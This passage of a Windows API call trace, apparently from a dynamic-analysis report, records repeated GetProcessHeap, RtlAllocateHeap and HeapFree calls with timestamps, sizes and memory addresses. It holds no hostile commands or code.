hHeap=0xe30000) returned 1 [0080.093] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xed3b10 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xed0058 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0xed3fa0 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f720 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xed4438 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0058 | out: hHeap=0xe30000) returned 1 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xed90d0 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4438 | out: hHeap=0xe30000) returned 1 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9fd10 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0xed4438 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9fd10 | out: hHeap=0xe30000) returned 1 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xed9560 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4438 | out: hHeap=0xe30000) returned 1 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0080.094] GetProcessHeap () returned 0xe30000 [0080.094] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0080.095] GetProcessHeap () returned 0xe30000 [0080.095] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.095] GetProcessHeap () returned 0xe30000 [0080.096] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0080.096] GetProcessHeap () returned 0xe30000 [0080.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0080.096] GetProcessHeap () returned 0xe30000 [0080.097] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0080.097] GetProcessHeap () returned 0xe30000 [0080.097] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.098] GetProcessHeap () returned 0xe30000 [0080.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.098] GetProcessHeap () returned 0xe30000 [0080.099] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0080.099] GetProcessHeap () returned 0xe30000 [0080.099] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0080.100] GetProcessHeap () returned 0xe30000 [0080.100] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0080.100] GetProcessHeap () returned 0xe30000 [0080.101] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0080.101] GetProcessHeap () returned 0xe30000 [0080.101] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, 